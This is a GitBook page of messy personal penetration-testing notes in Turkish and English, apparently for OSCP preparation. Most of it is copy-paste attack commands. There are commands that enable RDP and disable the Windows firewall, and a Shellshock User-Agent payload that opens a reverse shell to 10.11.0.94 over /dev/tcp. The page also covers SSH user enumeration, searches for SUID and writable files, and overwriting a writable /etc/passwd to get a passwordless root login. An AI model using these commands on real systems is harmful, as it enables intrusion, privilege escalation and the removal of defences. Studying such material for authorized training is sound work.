messy security notes
  • security is an illision
  • Useful Blog Links
  • Windows
    • ad-101
    • MS17-010
    • SMB
    • Post Exploitation Tricks
    • DCOM/RPC
    • Basic Commands
    • SMB Enumeration
  • Linux
    • SUID Set Edilmiş servicectl Abuse Etme
    • sudoers dosyası bozulursa?
    • SSH Welcome Message and Banner
    • pkexec ve pkttyagent
    • vipw , vigr , visudo
    • IP Forwarding
    • İki NIC Arasında Port Yönlendirme
    • tasksel
    • LAMP
    • Find All SUID Bit
    • Linux Operatorler
    • IFS
    • Ssh Public Key Tricks
    • Local & Remote Port Forwarding
    • Linux Priv Esc
    • Static IP
  • POST EXPLOITATION
    • from external network to domain admin
    • post exp 2
  • OSCP
  • Temel Komutlar ve Araçlar
  • Zayıf Servisler
  • Örnek Bir Senaryo
  • Parola Saldırıları
  • ms17-010 python exploit
  • Full Interactive Shell
  • Notes*
  • Apache James Server 2.3.2 Exploit
  • windows exploit suggester
  • FreeBsd and Some PHP tricks
  • fundamental blog
  • Metasoloit & Meterpreter & msfvenom
  • at-tftp server 1.9
  • Tunneling and Forwarding
  • Common Exploits
  • Windows Servisler
  • Execute process as another user
  • Teorik
    • Authentication and Authorization
    • Kullanıcı Hesap Türleri ve Hakları
    • Kerberos
  • SYSTEM
    • Apache2
    • Bind9 Log
    • apache - basic auth - proxy
  • Buffer Overflow - BOF
    • BOF - Stack Based
    • BoF Links
  • BASH SCRIPTING
    • Samples
  • keepnote
  • Docker
    • Docker
  • Misc
    • 50-cloud-init.yaml
Powered by GitBook
On this page
  • Enable RDP
  • Disable Firewall
  • Compile C code to exe in Linux
  • ShellShock
  • shellshock
  • Add diretory to PATH
  • Samba version
  • 64 Bit c and c++ compile in Linux
  • ssh user enumeration
  • udev 2.6
  • If /etc/passwd is writable;
  • writable file and directory

Was this helpful?

Notes*

Eğer ms08-67 exploiti var olmasına rağmen exploit edilemiyorsa veya encoding hatası alınırsa payloadı değiştir. Daha küçük payloadlar kullan. windows/shell_reverse_tcp gibi. meterpreter kullanma. payload büyük olursa metasploit "Exploit failed: No encoders encoded the buffer successfully." hatasını verir.

**Eğer administrator hesabı pasif ise STATUS_USER_SESSION_DELETED hatası verilir

Enable RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

User Yoksa:

ERROR: Failed to open connection - NT_STATUS_LOGON_FAILURE

User ve ama yetki yoksa ERROR:

Cannot connect to svcctl pipe. NT_STATUS_ACCESS_DENIED.

exploitin başarılı olması için IPC$ paylaşımına erişmesi lazım.

"You just need access to the IPC$ share, not a named pipe."

Disable Firewall

XP:
netsh firewall set opmode mode=DISABLE

New Windows Ver:
netsh advfirewall set allprofiles state off

Compile C code to exe in Linux

i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe

ShellShock

env x='() { :;}; echo vulnerable' bash -c "ps aux"
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"

Find writable files for user: find / -writable -type f 2>/dev/null | grep -v ^/proc

Find files which have stickey bit on /bin/find / -perm -4001 -type f 2>/dev/null

shellshock

User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.11.0.94/1234 0>&1

Add diretory to PATH

export PATH=$PATH:/usr/bin/

Samba version

msf > scanner/smb/smb_version

64 Bit c and c++ compile in Linux

# C
i686-w64-mingw32-gcc hello.c -o hello32.exe      # 32-bit
x86_64-w64-mingw32-gcc hello.c -o hello64.exe    # 64-bit
 
# C++
i686-w64-mingw32-g++ hello.cc -o hello32.exe     # 32-bit
x86_64-w64-mingw32-g++ hello.cc -o hello64.exe   # 64-bit

ssh user enumeration

for user in $(cat users.txt); do python sshuserenum.py --username $user IP; done

udev 2.6

If /etc/passwd is writable;

$ echo root::0:0:root:/root:/bin/bash > /etc/passwd

then;

su

root is gained!

writable file and directory

find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null
PreviousFull Interactive ShellNextApache James Server 2.3.2 Exploit

Last updated 5 years ago

Was this helpful?

udev exploit tutorial